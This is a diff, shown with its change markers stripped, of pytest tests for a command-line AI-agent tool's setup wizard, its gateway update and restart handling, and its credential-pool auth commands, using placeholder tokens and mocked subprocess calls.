raise AssertionError("same-provider pool prompt should not appear for copilot-acp")
|
||||
return False
|
||||
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_choice", fake_prompt_choice)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_yes_no", fake_prompt_yes_no)
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt", lambda *args, **kwargs: "")
|
||||
monkeypatch.setattr("hermes_cli.setup.prompt_yes_no", lambda *args, **kwargs: False)
|
||||
monkeypatch.setattr("hermes_cli.auth.get_active_provider", lambda: None)
|
||||
monkeypatch.setattr("hermes_cli.auth.detect_external_credentials", lambda: [])
|
||||
monkeypatch.setattr("hermes_cli.auth._login_openai_codex", lambda *args, **kwargs: None)
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.auth.resolve_codex_runtime_credentials",
|
||||
lambda *args, **kwargs: {
|
||||
"base_url": "https://chatgpt.com/backend-api/codex",
|
||||
"api_key": "codex-...oken",
|
||||
},
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.codex_models.get_codex_model_ids",
|
||||
lambda **kwargs: ["openai/gpt-5.3-codex", "openai/gpt-5-codex-mini"],
|
||||
)
|
||||
monkeypatch.setattr("agent.auxiliary_client.get_available_vision_backends", lambda: [])
|
||||
|
||||
setup_model_provider(config)
|
||||
|
||||
assert config.get("credential_pool_strategies", {}) == {}
|
||||
|
||||
|
||||
def test_setup_copilot_uses_gh_auth_and_saves_provider(tmp_path, monkeypatch):
|
||||
"""Copilot provider saves correctly through delegation."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
_stub_tts(monkeypatch)
|
||||
|
||||
config = load_config()
|
||||
|
||||
def fake_select():
|
||||
_write_model_config("copilot", "https://models.github.ai/inference/v1", "gpt-4o")
|
||||
|
||||
monkeypatch.setattr("hermes_cli.main.select_provider_and_model", fake_select)
|
||||
|
||||
setup_model_provider(config)
|
||||
save_config(config)
|
||||
|
||||
env = _read_env(tmp_path)
|
||||
reloaded = load_config()
|
||||
|
||||
assert env.get("OPENAI_BASE_URL") == ""
|
||||
assert env.get("OPENAI_API_KEY") == ""
|
||||
assert reloaded["model"]["provider"] == "openai-codex"
|
||||
assert reloaded["model"]["default"] == "openai/gpt-5.3-codex"
|
||||
assert reloaded["model"]["base_url"] == "https://chatgpt.com/backend-api/codex"
|
||||
assert isinstance(reloaded["model"], dict)
|
||||
assert reloaded["model"]["provider"] == "copilot"
|
||||
|
||||
|
||||
def test_setup_summary_marks_codex_auth_as_vision_available(tmp_path, monkeypatch, capsys):
|
||||
def test_setup_copilot_acp_uses_model_picker_and_saves_provider(tmp_path, monkeypatch):
|
||||
"""Copilot ACP provider saves correctly through delegation."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
_stub_tts(monkeypatch)
|
||||
|
||||
(tmp_path / "auth.json").write_text(
|
||||
'{"active_provider":"openai-codex","providers":{"openai-codex":{"tokens":{"access_token": "***", "refresh_token": "***"}}}}'
|
||||
)
|
||||
config = load_config()
|
||||
|
||||
monkeypatch.setattr("shutil.which", lambda _name: None)
|
||||
def fake_select():
|
||||
_write_model_config("copilot-acp", "", "claude-sonnet-4")
|
||||
|
||||
_print_setup_summary(load_config(), tmp_path)
|
||||
output = capsys.readouterr().out
|
||||
monkeypatch.setattr("hermes_cli.main.select_provider_and_model", fake_select)
|
||||
|
||||
assert "Vision (image analysis)" in output
|
||||
assert "missing run 'hermes setup' to configure" not in output
|
||||
assert "Mixture of Agents" in output
|
||||
assert "missing OPENROUTER_API_KEY" in output
|
||||
setup_model_provider(config)
|
||||
save_config(config)
|
||||
|
||||
reloaded = load_config()
|
||||
assert isinstance(reloaded["model"], dict)
|
||||
assert reloaded["model"]["provider"] == "copilot-acp"
|
||||
|
||||
|
||||
def test_setup_switch_custom_to_codex_clears_custom_endpoint_and_updates_config(
|
||||
tmp_path, monkeypatch
|
||||
):
|
||||
"""Switching from custom to codex updates config correctly."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
_stub_tts(monkeypatch)
|
||||
|
||||
# Start with custom
|
||||
_write_model_config("custom", "http://localhost:11434/v1", "qwen3.5:32b")
|
||||
|
||||
config = load_config()
|
||||
assert config["model"]["provider"] == "custom"
|
||||
|
||||
def fake_select():
|
||||
_write_model_config("openai-codex", "https://api.openai.com/v1", "gpt-4o")
|
||||
|
||||
monkeypatch.setattr("hermes_cli.main.select_provider_and_model", fake_select)
|
||||
|
||||
setup_model_provider(config)
|
||||
save_config(config)
|
||||
|
||||
reloaded = load_config()
|
||||
assert isinstance(reloaded["model"], dict)
|
||||
assert reloaded["model"]["provider"] == "openai-codex"
|
||||
assert reloaded["model"]["default"] == "gpt-4o"
|
||||
|
||||
|
||||
def test_setup_switch_preserves_non_model_config(tmp_path, monkeypatch):
|
||||
"""Provider switch preserves other config sections (terminal, display, etc.)."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
_clear_provider_env(monkeypatch)
|
||||
_stub_tts(monkeypatch)
|
||||
|
||||
config = load_config()
|
||||
config["terminal"]["timeout"] = 999
|
||||
save_config(config)
|
||||
|
||||
config = load_config()
|
||||
|
||||
def fake_select():
|
||||
_write_model_config("openrouter", model_name="gpt-4o")
|
||||
|
||||
monkeypatch.setattr("hermes_cli.main.select_provider_and_model", fake_select)
|
||||
|
||||
setup_model_provider(config)
|
||||
save_config(config)
|
||||
|
||||
reloaded = load_config()
|
||||
assert reloaded["terminal"]["timeout"] == 999
|
||||
assert reloaded["model"]["provider"] == "openrouter"
|
||||
|
||||
|
||||
def test_setup_summary_marks_anthropic_auth_as_vision_available(tmp_path, monkeypatch, capsys):
|
||||
|
|
|
|||
|
|
@ -25,6 +25,8 @@ def _make_run_side_effect(
|
|||
verify_ok=True,
|
||||
commit_count="3",
|
||||
systemd_active=False,
|
||||
system_service_active=False,
|
||||
system_restart_rc=0,
|
||||
launchctl_loaded=False,
|
||||
):
|
||||
"""Build a subprocess.run side_effect that simulates git + service commands."""
|
||||
|
|
@ -45,14 +47,23 @@ def _make_run_side_effect(
|
|||
if "rev-list" in joined:
|
||||
return subprocess.CompletedProcess(cmd, 0, stdout=f"{commit_count}\n", stderr="")
|
||||
|
||||
# systemctl --user is-active
|
||||
# systemctl is-active — distinguish --user from system scope
|
||||
if "systemctl" in joined and "is-active" in joined:
|
||||
if systemd_active:
|
||||
return subprocess.CompletedProcess(cmd, 0, stdout="active\n", stderr="")
|
||||
return subprocess.CompletedProcess(cmd, 3, stdout="inactive\n", stderr="")
|
||||
if "--user" in joined:
|
||||
if systemd_active:
|
||||
return subprocess.CompletedProcess(cmd, 0, stdout="active\n", stderr="")
|
||||
return subprocess.CompletedProcess(cmd, 3, stdout="inactive\n", stderr="")
|
||||
else:
|
||||
# System-level check (no --user)
|
||||
if system_service_active:
|
||||
return subprocess.CompletedProcess(cmd, 0, stdout="active\n", stderr="")
|
||||
return subprocess.CompletedProcess(cmd, 3, stdout="inactive\n", stderr="")
|
||||
|
||||
# systemctl --user restart
|
||||
# systemctl restart — distinguish --user from system scope
|
||||
if "systemctl" in joined and "restart" in joined:
|
||||
if "--user" not in joined and system_service_active:
|
||||
stderr = "" if system_restart_rc == 0 else "Failed to restart: Permission denied"
|
||||
return subprocess.CompletedProcess(cmd, system_restart_rc, stdout="", stderr=stderr)
|
||||
return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
|
||||
|
||||
# launchctl list ai.hermes.gateway
|
||||
|
|
@ -393,3 +404,91 @@ class TestCmdUpdateLaunchdRestart:
|
|||
assert "Stopped gateway" not in captured
|
||||
assert "Gateway restarted" not in captured
|
||||
assert "Gateway restarted via launchd" not in captured
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# cmd_update — system-level systemd service detection
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestCmdUpdateSystemService:
|
||||
"""cmd_update detects system-level gateway services where --user fails."""
|
||||
|
||||
@patch("shutil.which", return_value=None)
|
||||
@patch("subprocess.run")
|
||||
def test_update_detects_system_service_and_restarts(
|
||||
self, mock_run, _mock_which, mock_args, capsys, monkeypatch,
|
||||
):
|
||||
"""When user systemd is inactive but a system service exists, restart via system scope."""
|
||||
monkeypatch.setattr(gateway_cli, "is_macos", lambda: False)
|
||||
monkeypatch.setattr(gateway_cli, "is_linux", lambda: True)
|
||||
|
||||
mock_run.side_effect = _make_run_side_effect(
|
||||
commit_count="3",
|
||||
systemd_active=False,
|
||||
system_service_active=True,
|
||||
)
|
||||
|
||||
with patch("gateway.status.get_running_pid", return_value=12345), \
|
||||
patch("gateway.status.remove_pid_file"):
|
||||
cmd_update(mock_args)
|
||||
|
||||
captured = capsys.readouterr().out
|
||||
assert "system gateway service" in captured.lower()
|
||||
assert "Gateway restarted (system service)" in captured
|
||||
# Verify systemctl restart (no --user) was called
|
||||
restart_calls = [
|
||||
c for c in mock_run.call_args_list
|
||||
if "restart" in " ".join(str(a) for a in c.args[0])
|
||||
and "systemctl" in " ".join(str(a) for a in c.args[0])
|
||||
and "--user" not in " ".join(str(a) for a in c.args[0])
|
||||
]
|
||||
assert len(restart_calls) == 1
|
||||
|
||||
@patch("shutil.which", return_value=None)
|
||||
@patch("subprocess.run")
|
||||
def test_update_system_service_restart_failure_shows_sudo_hint(
|
||||
self, mock_run, _mock_which, mock_args, capsys, monkeypatch,
|
||||
):
|
||||
"""When system service restart fails (e.g. no root), show sudo hint."""
|
||||
monkeypatch.setattr(gateway_cli, "is_macos", lambda: False)
|
||||
monkeypatch.setattr(gateway_cli, "is_linux", lambda: True)
|
||||
|
||||
mock_run.side_effect = _make_run_side_effect(
|
||||
commit_count="3",
|
||||
systemd_active=False,
|
||||
system_service_active=True,
|
||||
system_restart_rc=1,
|
||||
)
|
||||
|
||||
with patch("gateway.status.get_running_pid", return_value=12345), \
|
||||
patch("gateway.status.remove_pid_file"):
|
||||
cmd_update(mock_args)
|
||||
|
||||
captured = capsys.readouterr().out
|
||||
assert "sudo systemctl restart" in captured
|
||||
|
||||
@patch("shutil.which", return_value=None)
|
||||
@patch("subprocess.run")
|
||||
def test_user_service_takes_priority_over_system(
|
||||
self, mock_run, _mock_which, mock_args, capsys, monkeypatch,
|
||||
):
|
||||
"""When both user and system services are active, user wins."""
|
||||
monkeypatch.setattr(gateway_cli, "is_macos", lambda: False)
|
||||
monkeypatch.setattr(gateway_cli, "is_linux", lambda: True)
|
||||
|
||||
mock_run.side_effect = _make_run_side_effect(
|
||||
commit_count="3",
|
||||
systemd_active=True,
|
||||
system_service_active=True,
|
||||
)
|
||||
|
||||
with patch("gateway.status.get_running_pid", return_value=12345), \
|
||||
patch("gateway.status.remove_pid_file"), \
|
||||
patch("os.kill"):
|
||||
cmd_update(mock_args)
|
||||
|
||||
captured = capsys.readouterr().out
|
||||
# Should restart via user service, not system
|
||||
assert "Gateway restarted." in captured
|
||||
assert "(system service)" not in captured
|
||||
|
|
|
|||
|
|
@ -622,6 +622,134 @@ class TestHasAnyProviderConfigured:
|
|||
from hermes_cli.main import _has_any_provider_configured
|
||||
assert _has_any_provider_configured() is True
|
||||
|
||||
def test_claude_code_creds_ignored_on_fresh_install(self, monkeypatch, tmp_path):
|
||||
"""Claude Code credentials should NOT skip the wizard when Hermes is unconfigured."""
|
||||
from hermes_cli import config as config_module
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
monkeypatch.setattr(config_module, "get_env_path", lambda: hermes_home / ".env")
|
||||
monkeypatch.setattr(config_module, "get_hermes_home", lambda: hermes_home)
|
||||
# Clear all provider env vars so earlier checks don't short-circuit
|
||||
for var in ("OPENROUTER_API_KEY", "OPENAI_API_KEY", "ANTHROPIC_API_KEY",
|
||||
"ANTHROPIC_TOKEN", "OPENAI_BASE_URL"):
|
||||
monkeypatch.delenv(var, raising=False)
|
||||
# Simulate valid Claude Code credentials
|
||||
monkeypatch.setattr(
|
||||
"agent.anthropic_adapter.read_claude_code_credentials",
|
||||
lambda: {"accessToken": "sk-ant-test", "refreshToken": "ref-tok"},
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"agent.anthropic_adapter.is_claude_code_token_valid",
|
||||
lambda creds: True,
|
||||
)
|
||||
from hermes_cli.main import _has_any_provider_configured
|
||||
assert _has_any_provider_configured() is False
|
||||
|
||||
def test_config_provider_counts(self, monkeypatch, tmp_path):
|
||||
"""config.yaml with model.provider set should count as configured."""
|
||||
import yaml
|
||||
from hermes_cli import config as config_module
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
config_file = hermes_home / "config.yaml"
|
||||
config_file.write_text(yaml.dump({
|
||||
"model": {"default": "anthropic/claude-opus-4.6", "provider": "openrouter"},
|
||||
}))
|
||||
monkeypatch.setattr(config_module, "get_env_path", lambda: hermes_home / ".env")
|
||||
monkeypatch.setattr(config_module, "get_hermes_home", lambda: hermes_home)
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
# Clear all provider env vars
|
||||
for var in ("OPENROUTER_API_KEY", "OPENAI_API_KEY", "ANTHROPIC_API_KEY",
|
||||
"ANTHROPIC_TOKEN", "OPENAI_BASE_URL"):
|
||||
monkeypatch.delenv(var, raising=False)
|
||||
from hermes_cli.main import _has_any_provider_configured
|
||||
assert _has_any_provider_configured() is True
|
||||
|
||||
def test_config_base_url_counts(self, monkeypatch, tmp_path):
|
||||
"""config.yaml with model.base_url set (custom endpoint) should count."""
|
||||
import yaml
|
||||
from hermes_cli import config as config_module
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
config_file = hermes_home / "config.yaml"
|
||||
config_file.write_text(yaml.dump({
|
||||
"model": {"default": "my-model", "base_url": "http://localhost:11434/v1"},
|
||||
}))
|
||||
monkeypatch.setattr(config_module, "get_env_path", lambda: hermes_home / ".env")
|
||||
monkeypatch.setattr(config_module, "get_hermes_home", lambda: hermes_home)
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
for var in ("OPENROUTER_API_KEY", "OPENAI_API_KEY", "ANTHROPIC_API_KEY",
|
||||
"ANTHROPIC_TOKEN", "OPENAI_BASE_URL"):
|
||||
monkeypatch.delenv(var, raising=False)
|
||||
from hermes_cli.main import _has_any_provider_configured
|
||||
assert _has_any_provider_configured() is True
|
||||
|
||||
def test_config_api_key_counts(self, monkeypatch, tmp_path):
|
||||
"""config.yaml with model.api_key set should count."""
|
||||
import yaml
|
||||
from hermes_cli import config as config_module
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
config_file = hermes_home / "config.yaml"
|
||||
config_file.write_text(yaml.dump({
|
||||
"model": {"default": "my-model", "api_key": "sk-test-key"},
|
||||
}))
|
||||
monkeypatch.setattr(config_module, "get_env_path", lambda: hermes_home / ".env")
|
||||
monkeypatch.setattr(config_module, "get_hermes_home", lambda: hermes_home)
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
for var in ("OPENROUTER_API_KEY", "OPENAI_API_KEY", "ANTHROPIC_API_KEY",
|
||||
"ANTHROPIC_TOKEN", "OPENAI_BASE_URL"):
|
||||
monkeypatch.delenv(var, raising=False)
|
||||
from hermes_cli.main import _has_any_provider_configured
|
||||
assert _has_any_provider_configured() is True
|
||||
|
||||
def test_config_dict_no_provider_no_creds_still_false(self, monkeypatch, tmp_path):
|
||||
"""config.yaml model dict with empty default and no creds stays false."""
|
||||
import yaml
|
||||
from hermes_cli import config as config_module
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
config_file = hermes_home / "config.yaml"
|
||||
config_file.write_text(yaml.dump({
|
||||
"model": {"default": ""},
|
||||
}))
|
||||
monkeypatch.setattr(config_module, "get_env_path", lambda: hermes_home / ".env")
|
||||
monkeypatch.setattr(config_module, "get_hermes_home", lambda: hermes_home)
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
for var in ("OPENROUTER_API_KEY", "OPENAI_API_KEY", "ANTHROPIC_API_KEY",
|
||||
"ANTHROPIC_TOKEN", "OPENAI_BASE_URL"):
|
||||
monkeypatch.delenv(var, raising=False)
|
||||
from hermes_cli.main import _has_any_provider_configured
|
||||
assert _has_any_provider_configured() is False
|
||||
|
||||
def test_claude_code_creds_counted_when_hermes_configured(self, monkeypatch, tmp_path):
|
||||
"""Claude Code credentials should count when Hermes has been explicitly configured."""
|
||||
import yaml
|
||||
from hermes_cli import config as config_module
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
# Write a config with a non-default model to simulate explicit configuration
|
||||
config_file = hermes_home / "config.yaml"
|
||||
config_file.write_text(yaml.dump({"model": {"default": "my-local-model"}}))
|
||||
monkeypatch.setattr(config_module, "get_env_path", lambda: hermes_home / ".env")
|
||||
monkeypatch.setattr(config_module, "get_hermes_home", lambda: hermes_home)
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
# Clear all provider env vars
|
||||
for var in ("OPENROUTER_API_KEY", "OPENAI_API_KEY", "ANTHROPIC_API_KEY",
|
||||
"ANTHROPIC_TOKEN", "OPENAI_BASE_URL"):
|
||||
monkeypatch.delenv(var, raising=False)
|
||||
# Simulate valid Claude Code credentials
|
||||
monkeypatch.setattr(
|
||||
"agent.anthropic_adapter.read_claude_code_credentials",
|
||||
lambda: {"accessToken": "sk-ant-test", "refreshToken": "ref-tok"},
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"agent.anthropic_adapter.is_claude_code_token_valid",
|
||||
lambda creds: True,
|
||||
)
|
||||
from hermes_cli.main import _has_any_provider_configured
|
||||
assert _has_any_provider_configured() is True
|
||||
|
||||
|
||||
# =============================================================================
|
||||
# Kimi Code auto-detection tests
|
||||
|
|
|
|||
391
tests/test_auth_commands.py
Normal file
391
tests/test_auth_commands.py
Normal file
|
|
@ -0,0 +1,391 @@
|
|||
"""Tests for auth subcommands backed by the credential pool."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import base64
|
||||
import json
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
def _write_auth_store(tmp_path, payload: dict) -> None:
|
||||
hermes_home = tmp_path / "hermes"
|
||||
hermes_home.mkdir(parents=True, exist_ok=True)
|
||||
(hermes_home / "auth.json").write_text(json.dumps(payload, indent=2))
|
||||
|
||||
|
||||
def _jwt_with_email(email: str) -> str:
|
||||
header = base64.urlsafe_b64encode(b'{"alg":"RS256","typ":"JWT"}').rstrip(b"=").decode()
|
||||
payload = base64.urlsafe_b64encode(
|
||||
json.dumps({"email": email}).encode()
|
||||
).rstrip(b"=").decode()
|
||||
return f"{header}.{payload}.signature"
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def _clear_provider_env(monkeypatch):
|
||||
for key in (
|
||||
"OPENROUTER_API_KEY",
|
||||
"OPENAI_API_KEY",
|
||||
"ANTHROPIC_API_KEY",
|
||||
"ANTHROPIC_TOKEN",
|
||||
"CLAUDE_CODE_OAUTH_TOKEN",
|
||||
):
|
||||
monkeypatch.delenv(key, raising=False)
|
||||
|
||||
|
||||
def test_auth_add_api_key_persists_manual_entry(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
monkeypatch.delenv("OPENROUTER_API_KEY", raising=False)
|
||||
monkeypatch.delenv("OPENAI_API_KEY", raising=False)
|
||||
_write_auth_store(tmp_path, {"version": 1, "providers": {}})
|
||||
|
||||
from hermes_cli.auth_commands import auth_add_command
|
||||
|
||||
class _Args:
|
||||
provider = "openrouter"
|
||||
auth_type = "api-key"
|
||||
api_key = "sk-or-manual"
|
||||
label = "personal"
|
||||
|
||||
auth_add_command(_Args())
|
||||
|
||||
payload = json.loads((tmp_path / "hermes" / "auth.json").read_text())
|
||||
entries = payload["credential_pool"]["openrouter"]
|
||||
entry = next(item for item in entries if item["source"] == "manual")
|
||||
assert entry["label"] == "personal"
|
||||
assert entry["auth_type"] == "api_key"
|
||||
assert entry["source"] == "manual"
|
||||
assert entry["access_token"] == "sk-or-manual"
|
||||
|
||||
|
||||
def test_auth_add_anthropic_oauth_persists_pool_entry(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
monkeypatch.delenv("ANTHROPIC_API_KEY", raising=False)
|
||||
monkeypatch.delenv("ANTHROPIC_TOKEN", raising=False)
|
||||
monkeypatch.delenv("CLAUDE_CODE_OAUTH_TOKEN", raising=False)
|
||||
_write_auth_store(tmp_path, {"version": 1, "providers": {}})
|
||||
token = _jwt_with_email("claude@example.com")
|
||||
monkeypatch.setattr(
|
||||
"agent.anthropic_adapter.run_hermes_oauth_login_pure",
|
||||
lambda: {
|
||||
"access_token": token,
|
||||
"refresh_token": "refresh-token",
|
||||
"expires_at_ms": 1711234567000,
|
||||
},
|
||||
)
|
||||
|
||||
from hermes_cli.auth_commands import auth_add_command
|
||||
|
||||
class _Args:
|
||||
provider = "anthropic"
|
||||
auth_type = "oauth"
|
||||
api_key = None
|
||||
label = None
|
||||
|
||||
auth_add_command(_Args())
|
||||
|
||||
payload = json.loads((tmp_path / "hermes" / "auth.json").read_text())
|
||||
entries = payload["credential_pool"]["anthropic"]
|
||||
entry = next(item for item in entries if item["source"] == "manual:hermes_pkce")
|
||||
assert entry["label"] == "claude@example.com"
|
||||
assert entry["source"] == "manual:hermes_pkce"
|
||||
assert entry["refresh_token"] == "refresh-token"
|
||||
assert entry["expires_at_ms"] == 1711234567000
|
||||
|
||||
|
||||
def test_auth_add_nous_oauth_persists_pool_entry(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_auth_store(tmp_path, {"version": 1, "providers": {}})
|
||||
token = _jwt_with_email("nous@example.com")
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.auth._nous_device_code_login",
|
||||
lambda **kwargs: {
|
||||
"portal_base_url": "https://portal.example.com",
|
||||
"inference_base_url": "https://inference.example.com/v1",
|
||||
"client_id": "hermes-cli",
|
||||
"scope": "inference:mint_agent_key",
|
||||
"token_type": "Bearer",
|
||||
"access_token": token,
|
||||
"refresh_token": "refresh-token",
|
||||
"obtained_at": "2026-03-23T10:00:00+00:00",
|
||||
"expires_at": "2026-03-23T11:00:00+00:00",
|
||||
"expires_in": 3600,
|
||||
"agent_key": "ak-test",
|
||||
"agent_key_id": "ak-id",
|
||||
"agent_key_expires_at": "2026-03-23T10:30:00+00:00",
|
||||
"agent_key_expires_in": 1800,
|
||||
"agent_key_reused": False,
|
||||
"agent_key_obtained_at": "2026-03-23T10:00:10+00:00",
|
||||
"tls": {"insecure": False, "ca_bundle": None},
|
||||
},
|
||||
)
|
||||
|
||||
from hermes_cli.auth_commands import auth_add_command
|
||||
|
||||
class _Args:
|
||||
provider = "nous"
|
||||
auth_type = "oauth"
|
||||
api_key = None
|
||||
label = None
|
||||
portal_url = None
|
||||
inference_url = None
|
||||
client_id = None
|
||||
scope = None
|
||||
no_browser = False
|
||||
timeout = None
|
||||
insecure = False
|
||||
ca_bundle = None
|
||||
|
||||
auth_add_command(_Args())
|
||||
|
||||
payload = json.loads((tmp_path / "hermes" / "auth.json").read_text())
|
||||
entries = payload["credential_pool"]["nous"]
|
||||
entry = next(item for item in entries if item["source"] == "manual:device_code")
|
||||
assert entry["label"] == "nous@example.com"
|
||||
assert entry["source"] == "manual:device_code"
|
||||
assert entry["agent_key"] == "ak-test"
|
||||
assert entry["portal_base_url"] == "https://portal.example.com"
|
||||
|
||||
|
||||
def test_auth_add_codex_oauth_persists_pool_entry(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_auth_store(tmp_path, {"version": 1, "providers": {}})
|
||||
token = _jwt_with_email("codex@example.com")
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.auth._codex_device_code_login",
|
||||
lambda: {
|
||||
"tokens": {
|
||||
"access_token": token,
|
||||
"refresh_token": "refresh-token",
|
||||
},
|
||||
"base_url": "https://chatgpt.com/backend-api/codex",
|
||||
"last_refresh": "2026-03-23T10:00:00Z",
|
||||
},
|
||||
)
|
||||
|
||||
from hermes_cli.auth_commands import auth_add_command
|
||||
|
||||
class _Args:
|
||||
provider = "openai-codex"
|
||||
auth_type = "oauth"
|
||||
api_key = None
|
||||
label = None
|
||||
|
||||
auth_add_command(_Args())
|
||||
|
||||
payload = json.loads((tmp_path / "hermes" / "auth.json").read_text())
|
||||
entries = payload["credential_pool"]["openai-codex"]
|
||||
entry = next(item for item in entries if item["source"] == "manual:device_code")
|
||||
assert entry["label"] == "codex@example.com"
|
||||
assert entry["source"] == "manual:device_code"
|
||||
assert entry["refresh_token"] == "refresh-token"
|
||||
assert entry["base_url"] == "https://chatgpt.com/backend-api/codex"
|
||||
|
||||
|
||||
def test_auth_remove_reindexes_priorities(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
# Prevent pool auto-seeding from host env vars and file-backed sources
|
||||
monkeypatch.delenv("ANTHROPIC_API_KEY", raising=False)
|
||||
monkeypatch.delenv("ANTHROPIC_TOKEN", raising=False)
|
||||
monkeypatch.delenv("CLAUDE_CODE_OAUTH_TOKEN", raising=False)
|
||||
monkeypatch.setattr(
|
||||
"agent.credential_pool._seed_from_singletons",
|
||||
lambda provider, entries: (False, set()),
|
||||
)
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"credential_pool": {
|
||||
"anthropic": [
|
||||
{
|
||||
"id": "cred-1",
|
||||
"label": "primary",
|
||||
"auth_type": "api_key",
|
||||
"priority": 0,
|
||||
"source": "manual",
|
||||
"access_token": "sk-ant-api-primary",
|
||||
},
|
||||
{
|
||||
"id": "cred-2",
|
||||
"label": "secondary",
|
||||
"auth_type": "api_key",
|
||||
"priority": 1,
|
||||
"source": "manual",
|
||||
"access_token": "sk-ant-api-secondary",
|
||||
},
|
||||
]
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
from hermes_cli.auth_commands import auth_remove_command
|
||||
|
||||
class _Args:
|
||||
provider = "anthropic"
|
||||
index = 1
|
||||
|
||||
auth_remove_command(_Args())
|
||||
|
||||
payload = json.loads((tmp_path / "hermes" / "auth.json").read_text())
|
||||
entries = payload["credential_pool"]["anthropic"]
|
||||
assert len(entries) == 1
|
||||
assert entries[0]["label"] == "secondary"
|
||||
assert entries[0]["priority"] == 0
|
||||
|
||||
|
||||
def test_auth_reset_clears_provider_statuses(tmp_path, monkeypatch, capsys):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"credential_pool": {
|
||||
"anthropic": [
|
||||
{
|
||||
"id": "cred-1",
|
||||
"label": "primary",
|
||||
"auth_type": "api_key",
|
||||
"priority": 0,
|
||||
"source": "manual",
|
||||
"access_token": "sk-ant-api-primary",
|
||||
"last_status": "exhausted",
|
||||
"last_status_at": 1711230000.0,
|
||||
"last_error_code": 402,
|
||||
}
|
||||
]
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
from hermes_cli.auth_commands import auth_reset_command
|
||||
|
||||
class _Args:
|
||||
provider = "anthropic"
|
||||
|
||||
auth_reset_command(_Args())
|
||||
|
||||
out = capsys.readouterr().out
|
||||
assert "Reset status" in out
|
||||
|
||||
payload = json.loads((tmp_path / "hermes" / "auth.json").read_text())
|
||||
entry = payload["credential_pool"]["anthropic"][0]
|
||||
assert entry["last_status"] is None
|
||||
assert entry["last_status_at"] is None
|
||||
assert entry["last_error_code"] is None
|
||||
|
||||
|
||||
def test_clear_provider_auth_removes_provider_pool_entries(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
"version": 1,
|
||||
"active_provider": "anthropic",
|
||||
"providers": {
|
||||
"anthropic": {"access_token": "legacy-token"},
|
||||
},
|
||||
"credential_pool": {
|
||||
"anthropic": [
|
||||
{
|
||||
"id": "cred-1",
|
||||
"label": "primary",
|
||||
"auth_type": "oauth",
|
||||
"priority": 0,
|
||||
"source": "manual:hermes_pkce",
|
||||
"access_token": "pool-token",
|
||||
}
|
||||
],
|
||||
"openrouter": [
|
||||
{
|
||||
"id": "cred-2",
|
||||
"label": "other-provider",
|
||||
"auth_type": "api_key",
|
||||
"priority": 0,
|
||||
"source": "manual",
|
||||
"access_token": "sk-or-test",
|
||||
}
|
||||
],
|
||||
},
|
||||
},
|
||||
)
|
||||
|
||||
from hermes_cli.auth import clear_provider_auth
|
||||
|
||||
assert clear_provider_auth("anthropic") is True
|
||||
|
||||
payload = json.loads((tmp_path / "hermes" / "auth.json").read_text())
|
||||
assert payload["active_provider"] is None
|
||||
assert "anthropic" not in payload.get("providers", {})
|
||||
assert "anthropic" not in payload.get("credential_pool", {})
|
||||
assert "openrouter" in payload.get("credential_pool", {})
|
||||
|
||||
|
||||
def test_auth_list_does_not_call_mutating_select(monkeypatch, capsys):
|
||||
from hermes_cli.auth_commands import auth_list_command
|
||||
|
||||
class _Entry:
|
||||
id = "cred-1"
|
||||
label = "primary"
|
||||
auth_type="***"
|
||||
source = "manual"
|
||||
last_status = None
|
||||
last_error_code = None
|
||||
last_status_at = None
